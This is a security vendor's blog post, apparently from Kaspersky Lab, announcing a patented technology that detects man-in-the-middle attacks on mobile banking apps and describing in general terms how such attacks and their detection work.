We are pleased to introduce a major reinforcement in our arsenal of security technologies: Kaspersky Lab has patented technology enabling our software to detect man-in-the-middle (MitM) attacks, beloved of authors of financial malware. It is our hope that the technology will greatly reduce the profitability of such scams.<\/p>\n
We began development several years ago, after mobile banking had gained real popularity. Once people were increasingly using online payment applications, cybercriminals followed, becoming more adept at stealing money electronically. One of the most common techniques still regularly used in banking malware involves compromising the communication channel \u2014 the MitM attack.<\/p>\n
Isn\u2019t anyone in the middle? #MITM #protectmybiz<\/p>Tweet<\/a><\/blockquote>\n
During an MitM attack, an attacker essentially intercepts the information-exchange channel between the bank and the client, substituting the data the client receives. That is, the mobile application is not communicating with the bank as the user assumes, but rather it sends information to an outside system. At the same time, cybercriminals handle communications with the bank (with obvious results). The specific scenarios enabling such attacks are numerous, as are the technologies that fraudsters use. Some examples are DNS spoofing (poisoning the DNS server\u2019s cache), replacing security certificates, public wireless networks parasitizing, and intercepting the traffic on the device side by means of malware with elevated system privileges, but there are more.<\/p>\n
We decided to create technology that would let banks identify a MitM attack \u2014 regardless of which techniques attackers used. In other words, our task was to come up with a method that would enable client\u2019s device to make sure that it is indeed the bank\u2019s information system on the other side of the connection. Kaspersky Lab\u2019s method rechecks data sent to the financial application to ensure it really came from the bank.<\/p>\n
Let\u2019s see how it works in a typical attack, say through an open Wi-Fi network in a caf\u00e9. A user tries to access a bank account using the bank\u2019s official application, but the caf\u00e9 network is under the control of cybercriminals. When the user opens with the banking application, the compromised network prevents the app from establishing an https connection, thus forcing the user to use a browser instead. The browser tries to establish an unprotected http connection with the bank\u2019s site, but somewhere in the caf\u00e9\u2019s router, the http request is redirected to a malicious server, where a fake copy of the required site is deployed. When the user enters his or her username and password, the crooks capture the credentials.<\/p>\n
We decided to create technology that would let banks identify a #MitM attack, no matter\u00a0techniques attackers used. #protectmybiz<\/p>Tweet<\/a><\/blockquote>\n
A key aspect of this attack is that, when trying to imitate the banking site\u2019s behavior, the server sends a response to the request. Despite all attempts to copy a legitimate response, the fake response simply can\u2019t be identical. And that is where our technology intervenes: It allows the resending of the received response and compares that with the data the user should have received from the real bank.<\/p>\n
This technology has the potential to do more than just reveal the fact of a MitM attack; it can also detect the point at which attackers interposed their instructions in the communication channel. In a perfect world that might help you find the criminals.<\/p>\n
The anti-MitM technology is already in Kaspersky Lab\u2019s products, including Kaspersky Fraud Prevention<\/a>, which, among other things, protects online banking processes on Android and iOS systems.<\/p>\n